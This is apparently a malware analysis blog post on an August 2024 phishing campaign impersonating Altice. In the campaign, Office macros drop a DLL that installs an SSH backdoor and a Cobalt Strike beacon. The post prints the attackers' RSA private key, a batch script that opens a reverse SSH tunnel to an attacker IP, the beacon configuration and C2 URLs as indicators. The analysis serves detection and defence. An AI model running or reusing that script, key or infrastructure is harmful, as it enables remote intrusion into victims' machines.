On August 21, 2024, a new malware spreading through phishing pages was identified. This malware appears as part of a campaign impersonating the Altice corporation. It takes advantage of Office documents, specifically a DOCX and an XLSM file with suggestive names related to a financial report for the first half of 2024, to deceive victims into executing malicious code.

The documents contain VBA macros that trigger a DLL binary (2nd stage) hardcoded in a byte array. The goal of these macros is to write the DLL to disk (auxiliary2.aux file) and inject it directly into the memory. Once executed, this DLL downloads a BAT file from a C2 (Command and Control) server, whose function is to establish an SSH backdoor, allowing remote control over the victim’s computer. Additionally, a second file containing a private key necessary for establishing the SSH connection between the parts.

The DLL is also responsible for downloading a Cobalt Strike beacon, a tool commonly used for lateral movement and privilege escalation in compromised networks. This beacon is then executed through the werfault.exe process, a Windows process used to report error failures. By exploiting this legitimate process, the malware is able to camouflage its malicious activities within a trusted process and avoid detection.

 

Key points

    • Identification of the malware on August 21, 2024, and impersonating (or targeting) a single company.
    • Office documents (DOCX and XLSM) with malicious macros, disguised as financial reports.
    • VBA macros containing a DLL hardcoded in a byte array then dropped and injected in memory.
    • DLL downloads a BAT file from the C2 to establish an SSH backdoor (and also the private key).
    • DLL communicates with the C2 to download and execute a Cobalt Strike beacon.
    • Execution of the beacon through the legitimate Windows process werfault.exe.
    • Use of werfault.exe to hide malicious activities and avoid detection.

 

Technical Details

The initial indicators of compromise (IOCs) for this malware were first identified and shared by the MalwareHunterTeam on their Twitter page. This discovery catalyzed a deeper investigation into the threat, leading to the detailed analysis below.


In detail, two types of files were disseminated by the cybercriminals: DOCX and XLSM files. Email is always the used vehicle to distribute files of this nature. Both of these contained VBA macros that served as the initial trigger for the 2nd stage. These macros are responsible for launching the next malware stages.

The following diagram provides a high-level overview of the modus operandi of this campaign.

Figure 1: High-level diagram depicting the malware chain.

 

In general, the DOCX and XLSM files are distributed with VBA macros inside. The domain updates.]catalogs.]pt (1) is queried as a way to update the template. It downloads the file named reporte-financeiro-template.dot. This .dot file is a Word template file, which can contain predefined settings, styles, macros, and possibly additional content.

The VBA macros inside the file are the trigger to drop and execute a hardcoded DLL – auxiliary2.aux) (2). This DLL is executed in memory and contacts the domain upds.]azureedge.]net, from which three files are downloaded (3), including the private key and a BAT (4) file with code to expose a remote port from the attacker’s computer on the victim’s machine (SSH connection on the graph above). Additionally, a CobaltStrike beacon is downloaded, which is executed in memory through the Windows process WerFault.exe (5). Finally, the attacker can control the remote machine via the SSH tunnel or simply via the CobalStrike beacon (6).

 

DOCX and XLSM Files

Below are presented the DOCX and XLSM files used in this malware chain by crooks. As observed, this malware appears as part of a campaign targeting the Altice corporation.

Figure 2: Phishing template and DOCX and XLSM files disseminated during the malware campaign.

 

VBA Macros in detail

File: Relatorio financeiro.docx
MD5: 8fcf70002316eee7efb885f997946864
File: reporte-financeiro.xlsm
MD5: 6b9be29eb7a31fb3e24cae3bcc5ba752

As seen, the target files contain malicious VBA Macros.

Figure 3: VBA Macros hardcoded inside the target files.

Criminals often use these macros because they allow for the execution of malicious code directly within trusted documents, making it easier to bypass standard security controls. These macros can easily be created using toolkits like MacroPack, as mentioned in the podcast episode 0x14 of “Manhãs em Cibersegurança” (in Portuguese).


 

The VBA code executes a set of malicious operations when the document is opened in Microsoft Word (docx) or Excel (xlsm). The main functions observed are the following:

Sub AutoOpen()

    • Function: This function runs automatically when the document is opened. This is a common technique used by malicious macros to execute code without the user’s knowledge.
    • Operations:
      • File Creation: It checks if Office is 64-bit or 32-bit and calls WriteToFile64 or WriteToFile to write a file called auxiliary2.aux to the system’s temporary folder.
      • ChDir temp: Changes the working directory to the temporary folder.
      • unlink(): After displaying a message to the user (a trap), it calls the unlink function, which performs cleanup operations, including attempting to modify or restore document templates.
      • calculate(): This function is executed and responsible for executing the auxiliary2.aux malicious DLL (2nd stage). The External Address Table (EAT) function “fill_data” is invoked in runtime and will execute the DLL.
        • calculate_values: Declares an external function (fill_data) located in a binary file (auxiliary2.aux). The calculate_values function is used within the calculate function and this functions is responsible for executing the DLL auxiliary2.aux in memory.

Figure 4: Part of the malicious VBA Macros.

 

In sum, the VBA macros are responsible for creating the auxiliary2.aux DLL (the 2nd stage) with the code to download from the C2 server the next malware files. By modifying the Normal.dotm template, the macro ensures that it (or other malicious macros) will be executed in future Word documents. Finally, the unlink and DeleteVBAPROJECT functions suggest that the code is attempting to erase its tracks by removing the VBA code after execution, a common technique in malicious macros.

 

2nd stage: auxiliary2.aux DLL

File: auxiliary2.aux
MD5: ae2bb59ce889ed99acdc3d0fd8cbbcb2
Entropy: 6.16167(not packed)
Mode: 64-bit


Below, we can see the Export Address Table (EAT) from the auxiliary2.aux DLL, which is downloaded and executed in memory by the VBA macro embedded in the malicious documents. The fill_data function, present in this export table, is the main entry point used by the macro to interact with the DLL during runtime (1 – red color).

Figure 5: EAT table of auxiliary2.aux DLL with the fill_data call highlighted.

 

As seen, the DLL is not packed or protected and its content can be analyzed to understand its internal capabilities. As noticed, clean text can be easily obtained by analyzing the binary strings.

Figure 6: Demonstration that DLL is not packed or protected and clean text can be obtained by analyzing the binary strings.

 

C2 connection and dropped files

During runtime, the auxiliary2.aux DLL connects to the Command and Control (C2) server to download three additional files. These files play a critical role in establishing a persistent backdoor and facilitating further malicious activities on the victim’s machine.

    1. Private Key (azsvc-priv): This private key is used for SSH communication between the infected machine and the attacker’s infrastructure, allowing secure remote access.

    2. Batch File (azsvc-backup.bat): This .bat file is responsible for configuring the SSH backdoor, exposing a remote port from the attacker’s machine on the victim’s system.

    3. CobaltStrike Beacon: This beacon is downloaded and executed in memory, using werfault.exe, a legitimate Windows process, to evade detection. The beacon is used to maintain control over the compromised system and facilitate further malicious actions.

These additional files underline the sophistication of the attack, as the use of SSH backdoors combined with a CobaltStrike beacon ensures both persistence and the ability to execute commands remotely.

Figure7: Piece of code responsible for downloading additional files from the C2 server.

The Command and Control (C2) server address used by the auxiliary2.aux DLL is upds.]azureedge.]net. This C2 server facilitates the download of additional payloads, including the private key (azsvc-priv) from the /feed path and the batch file (azsvc-backup.bat) from the /rss path as depicted below.

Figure 8: Part of the code used to download the two files from the C2 server onto the disk.

 

If the download from the C2 server fails, the auxiliary2.aux DLL has these two files hardcoded within itself. These files are then automatically dropped onto the disk under the path \Users\User\AppData\Local, ensuring the attack proceeds even without a successful connection to the C2 server. This fallback mechanism increases the resilience of the malware’s operation.

Figure 9: The two files are also persistent on the DLL file and dropped onto the disk if the connection with the C2 fails.

Two ways but the same goal

The private key and the .BAT file (responsible for establishing an SSH connection between the victim’s machine and the attacker’s) are hardcoded into the DLL because, technically, the CobaltStrike beacon may be blocked by security appliances.

The SSH tunnel serves as a backup plan for the attacker in case the CobaltStrike connection is thwarted. Additionally, it can be viewed as a persistence tactic, allowing the attacker to maintain access to the compromised infrastructure through alternative means, even if the primary method (CobaltStrike) is detected and blocked.

 

The original files are presented below.

Filename: azsvc-priv
MD5: 19aa68dd2332d55e6b02765f0d82723a

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAiEIwzX4kZheIhSkd3h7ANu+HjMEc1Hn0DUa+8C9/Fnqd9j9I
1kPOJHuH8ka20fHplFDeQp0RV0OszhcRFnbXnY9DWeiv9waYqwmpxWV56yNF8Oz8
0zHsaZgfOBoe36g4q1V3l4MeDl9+l6sSy+wOaXcOvIyZ5oiFLpCj7GUIHAB/CWLz
QXYmBvOCmjFeAaVwJZg6icVN4PNx+fs9gcu21cIbLb/M7QaiCkdQrKlLEwcH3yPq
uefAWN/Btn3EiHJrN93ooFP866hssTXH6SvEh8A/HETy3sVc0hByGDa/r6huIInh
ShVF/ezixX5Z6l8pBBMpSxjRic/QR/km+Isu6QIDAQABAoIBAHl2r7RvLxlG/y7d
AUABH42ZJrdFamLKN9Eh8JGBdYPfWDKsJUzDct64s+44NT6frH3HPOoaw9uLe17X
1ya0V+6fSAW81Ceb3LoTSiCqHe2LKwzi5VmK1lkm/yVuu3jap3GsJYiNnFxpqhqf
qIjZ69r+A8f2eja0GizxSP8w7PKv8DAwA1EvUWURukfWFSdSQbxhkIUN+DcpU16h
xHrvBDaSv1sD0/ssEc5889+DnWLKVActU4RXfTF2imOK2u25Z5zdswUvaSs1EpYN
IuRWfw8vdlmP6TR9Jdu+Lzu2yIZurWwzjBapP3JqDidHnib/gdZ0tVhXuG5ySbeL
lt/9upECgYEA98Q3KZ0+M9JIQP2XjLXDEy3aZv5r9vZs4l5hO9QzkNUQdXf/TkIE
Q+kbRfgIa15COYknDQYVo3md5wkprrn+wHitvjBiniF8MuRYvTCVxo5PMJkAJqau
GbcZwxW2N6I09t/MueDF83Q49jIoxSqMa1qTKjETYZ0lw79hRDOejQUCgYEAjMlc
jXVa1Bzp522QIifK2oJDdtYZYP1exA02deKi1wBuYlaFlVliwiIAVHYMEQGOOYsY
i0LdxDqnSx9yi/N16vfQr+reaqhndB+6XzHkBlYrwfNauwf8/rdVp450MNQC1hae
jsJ0m7bTiaRXf5ugB2OhlvRrTCYyUtj/PMyJn5UCgYEAhwLlDEgjHRn5RXDqpEJn
iovx9y2sp2ag7rl/Qprffoyb62b4OCzBJkBgHECMVfWHINMb9HzcTbh30u2rSQsR
RtB73KeBFaopg5HqyS0wcIIbpN+6tVUeieS8pRGvuaEqO1y4spFJTOCIKaArl0UY
P2ebyeH0Lbz0VzZySjfWrgECgYAmjk7GfsktJe3470x1zigDx4DqXp/8q+b0EhpE
Fpk6AGg6ji9vQ1eEiwNEHkAXuDFXGPzTxrAtOVLvg+E+6qH0g4Gna88VrqEGcFn+
EA++nILHTvoeFoX2zAatKJoxdR6BuxgZSK/epScxnsxHqjsdSu/KA44PALbvcXYV
FH7sMQKBgQClAL8mO6xxr2oNz1mhaeVOyLUV+G9SNwZBq1JPSy+QvaxCLXewIlku
rJ/4qbZu7QosFyiDedVxdev6ROKcBUsh9OpXVstosQ2pkOENc2BxnqbcfJHPE3tA
E7ui5KwhiLA/N7t9p8yJ+4AGrEXMJ+XKMFec9uXmt9MtLmmHVuvPNQ==
-----END RSA PRIVATE KEY-----

 

Filename: azsvc-backup.bat
MD5: 640e2765c8ebacf34934b55f98f5aaf2

@echo off
netstat -anp tcp | find /I "68.221.169.191:22"
if errorlevel 1 (
    start /b ssh.exe -f -i ###PLACEHOLDER###\azsvc-priv -o StrictHostKeyChecking=no -o ServerAliveInterval=30 [email protected] -N -T -R 8765 -p 443
) Else (
    EXIT
)

 

Here is a breakdown of what the script does:

  1. @echo off: This suppresses the display of the command as it is executed, making the script more “silent.”
  2. netstat -anp tcp | find /I "68.221.169.191:22": This command checks all active TCP connections (netstat -anp tcp) and pipes (|) the output to the find command, which searches for the string "68.221.169.191:22". The /I option makes the search case-insensitive.
  3. if errorlevel 1: This checks the exit code (error level) of the previous command. If no match was found (i.e., the connection is not currently active), the errorlevel will be 1.
  4. ( start /b ssh.exe -f -i ###PLACEHOLDER###\azsvc-priv -o StrictHostKeyChecking=no -o ServerAliveInterval=30 [email protected] -N -T -R 8765 -p 443 )
    • If the SSH connection isn’t found, it starts a new SSH connection in the background (start /b).
    • The ssh.exe command is executed with several parameters:
      • -f: Requests SSH to go to the background after authentication.
      • -i ###PLACEHOLDER###\azsvc-priv: Specifies the private key to be used for authentication (with a placeholder for the actual file path).
      • -o StrictHostKeyChecking=no: Disables strict host key checking, which means SSH will not prompt for confirmation when connecting to a new host.
      • -o ServerAliveInterval=30: Sends a server alive message every 30 seconds to keep the connection active.
      • [email protected]: The username (azsvc) and server address (68.221.169.191) to connect to.
      • -N: Tells SSH not to execute a remote command, useful for port forwarding.
      • -T: Disables pseudo-tty allocation.
      • -R 8765: Sets up remote port forwarding, meaning that port 8765 on the remote server (68.221.169.191) will be forwarded to the local machine.
      • -p 443: Specifies the remote port for the SSH connection, in this case, port 443.
  5. Else ( EXIT ): If the connection is found (i.e., errorlevel is not 1), the script will exit without starting a new SSH session.

 

Next, the CobaltStrike beacon is downloaded and executed in memory. The communication to the C2 server is as follows:

{
  "C2Server": "http://upds.azureedge.net:443/5xDl",
  "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"
}

 

This beacon allows the attacker to maintain remote control over the compromised machine, using stealth techniques to avoid detection while communicating with the command-and-control server.

After that, the communication is maintained as observed below (httpx://upds.]azureedge.]net/_/scs/mail-static/_/js/).

 

The Beacon is then injected into the WerFault.exe process, a legitimate Windows process responsible for error reporting. By leveraging this process, the malware gains stealth, making it harder for security solutions to detect the malicious activity. This technique is commonly used to avoid raising suspicion, as WerFault.exe is a trusted system process.

 {
"type": "other",
"tags": [],
"key": "spawnto_x64",
"value": "%windir%\\sysnative\\werfault.exe",
"value_format": "string"
},
{
"type": "other",
"tags": [],
"key": "spawnto_x86",
"value": "%windir%\\syswow64\\werfault.exe",
"value_format": "string"
},

 

Final Thoughts

This malware campaign through malicious DOCX and XLSM files represents a sophisticated, multi-stage attack. By leveraging phishing emails and office macros, the criminals successfully bypassed initial defenses and dropped malicious payloads in the form of DLLs, private keys, and batch scripts. The use of hardcoded files within the DLL ensures persistence even if certain payloads, like the Cobalt Strike beacon, are blocked by security appliances. Additionally, the fallback mechanism of establishing an SSH tunnel provides attackers with an alternative means of maintaining control over compromised systems, highlighting the sophistication of this attack.

The injection of the Cobalt Strike beacon into the WerFault.exe process further demonstrates the attackers’ understanding of stealth techniques, using a legitimate system process to evade detection. The overall complexity of this malware campaign emphasizes the need for heightened vigilance, robust security monitoring, and the implementation of proactive defense mechanisms.

Organizations must be prepared for such advanced threats by regularly educating users on phishing techniques, monitoring network traffic for unusual behavior, and leveraging multi-layered security solutions capable of detecting and mitigating these types of sophisticated attacks.

 

MITRE ATT&CK

 

Indicators of Comprimise (IoCs)

CobalStrike beacon config

[
  {
    "parser": "CobaltStrike",
    "metadata": [
      {
        "type": "version",
        "value": "4.6",
        "tags": []
      },
      {
        "type": "other",
        "tags": [],
        "key": "Beacon Type",
        "value": "HTTPS",
        "value_format": "string"
      },
      {
        "type": "socket",
        "tags": [],
        "address": null,
        "port": 443,
        "network_protocol": null,
        "c2": null,
        "listen": null
      },
      {
        "type": "interval",
        "tags": ["Seconds between C2 Check-ins"],
        "value": 10.0
      },
      {
        "type": "other",
        "tags": [],
        "key": "MaxGetSize",
        "value": 2049376,
        "value_format": "integer"
      },
      {
        "type": "other",
        "tags": [],
        "key": "Jitter",
        "value": 13,
        "value_format": "integer"
      },
      {
        "type": "encryption_key",
        "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGhhs8+XVWx8EZhzOgF95D/FVdiySLGRV7UNs8JQ4f7VGg00RdMpouGs/Fo7ovkpe/mRg8P6Or/Bv2JBJWVRu4GzqalWUzGKliT1kicwRR1pADHHwGzuKyPixP7UuDIJ/CrRWnqmSfi9UqH+TAPvbhjoXW74oLwOibKrKsPYsyrQIDAQAB",
        "tags": ["SubjectPublicKeyInfo Structure"],
        "algorithm": "RSA",
        "mode": null,
        "iv": null
      },
      {
        "type": "url",
        "url": "https://upds.azureedge.net/_/scs/mail-static/_/js/",
        "tags": [],
        "socket": {
          "type": "socket",
          "tags": [],
          "address": "upds.azureedge.net",
          "port": null,
          "network_protocol": null,
          "c2": true,
          "listen": null
        },
        "path": "/_/scs/mail-static/_/js/",
        "query": "",
        "application_protocol": "https",
        "credential": null
      },
      {
        "type": "user_agent",
        "value": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)",
        "tags": []
      },
      {
        "type": "other",
        "tags": [],
        "key": "HttpPostUri",
        "value": "/mail/u/0/",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "MalleableC2Instructions",
        "value": "Remove 375 chars from the end, Remove 250 chars from the end, Remove 4 chars from the beginning, Remove 28 chars from the beginning, Remove 36 chars from the beginning, Remove 18 chars from the beginning, Remove 4 chars from the beginning, Remove 28 chars from the beginning, Remove 36 chars from the beginning, Remove 17 chars from the beginning, Remove 4 chars from the beginning",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "HTTPGetClient",
        "value": "base64, header Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "HTTPPostClient",
        "value": "base64, base64, parameter ui=d3244c4707",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "HTTPGet_Verb",
        "value": "GET",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "HTTPPost_Verb",
        "value": "POST",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "spawnto_x64",
        "value": "%windir%\\sysnative\\werfault.exe",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "spawnto_x86",
        "value": "%windir%\\syswow64\\werfault.exe",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "Proxy_Behavior",
        "value": "Use IE settings",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "Watermark",
        "value": 667840912,
        "value_format": "integer"
      },
      {
        "type": "other",
        "tags": [],
        "key": "bStageCleanup",
        "value": true,
        "value_format": "boolean"
      },
      {
        "type": "other",
        "tags": [],
        "key": "bCFGCaution",
        "value": false,
        "value_format": "boolean"
      },
      {
        "type": "other",
        "tags": [],
        "key": "bProcInject_StartRWX",
        "value": false,
        "value_format": "boolean"
      },
      {
        "type": "other",
        "tags": [],
        "key": "bProcInject_UseRWX",
        "value": false,
        "value_format": "boolean"
      },
      {
        "type": "other",
        "tags": [],
        "key": "bProcInject_MinAllocSize",
        "value": 4096,
        "value_format": "integer"
      },
      {
        "type": "other",
        "tags": [],
        "key": "ProcInject_AllocationMethod",
        "value": "NtMapViewOfSection",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "bUseCookies",
        "value": true,
        "value_format": "boolean"
      },
      {
        "type": "other",
        "tags": [],
        "key": "DNS_strategy",
        "value": "round-robin",
        "value_format": "string"
      },
      {
        "type": "other",
        "tags": [],
        "key": "DNS_rotate_seconds",
        "value": -1,
        "value_format": "integer"
      },
      {
        "type": "other",
        "tags": [],
        "key": "DNS_strategy_fail_x",
        "value": -1,
        "value_format": "integer"
      },
      {
        "type": "other",
        "tags": [],
        "key": "DNS_strategy_fail_seconds",
        "value": -1,
        "value_format": "integer"
      }
    ]
  }
]



{
  "BeaconType": [
    "HTTPS"
  ],
  "Port": 443,
  "SleepTime": 10000,
  "MaxGetSize": 2049376,
  "Jitter": 13,
  "C2Server": "upds.azureedge.net,/_/scs/mail-static/_/js/",
  "HttpPostUri": "/mail/u/0/",
  "Malleable_C2_Instructions": [
    "Remove 375 bytes from the end",
    "Remove 250 bytes from the end",
    "Remove 4 bytes from the beginning",
    "Remove 28 bytes from the beginning",
    "Remove 36 bytes from the beginning",
    "Remove 18 bytes from the beginning",
    "Remove 4 bytes from the beginning",
    "Remove 28 bytes from the beginning",
    "Remove 36 bytes from the beginning",
    "Remove 17 bytes from the beginning",
    "Remove 4 bytes from the beginning"
  ],
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%\\syswow64\\werfault.exe",
  "Spawnto_x64": "%windir%\\sysnative\\werfault.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 667840912,
  "bStageCleanup": "True",
  "bCFGCaution": "False",
  "KillDate": 0,
  "bProcInject_StartRWX": "False",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 4096,
  "ProcInject_PrependAppend_x86": [
    "M8CQ",
    "kDPA"
  ],
  "ProcInject_PrependAppend_x64": [
    "Dx8ARWaH24fbQkdmh9JBDx8ARkRmh8lITJCHyUlAZpBmDx8EAA8fAIfSDx8EAEBD",
    "kDHA"
  ],
  "ProcInject_Execute": [
    "ntdll.dll:RtlUserThreadStart",
    "kernel32.dll:LoadLibraryA",
    "NtQueueApcThread",
    "NtQueueApcThread-s",
    "RtlCreateUserThread",
    "SetThreadContext"
  ],
  "ProcInject_AllocationMethod": "NtMapViewOfSection",
  "bUsesCookies": "True",
  "HostHeader": ""
}

 

C2 server

https://upds.[azureedge.[net/5xDl
https://upds.[azureedge.[net/mail/u/0/?ui=d3244c4707&hop=6928632&start=0
https://upds.[azureedge.[net/_/scs/mail-static/_/js/

https://upds[.azureedge.[net/rss
https://upds[.azureedge.[net/feed
updates[.catalogs.[pt
68.221.169.191

 

 


Deixe um comentário

O seu endereço de email não será publicado. Campos obrigatórios marcados com *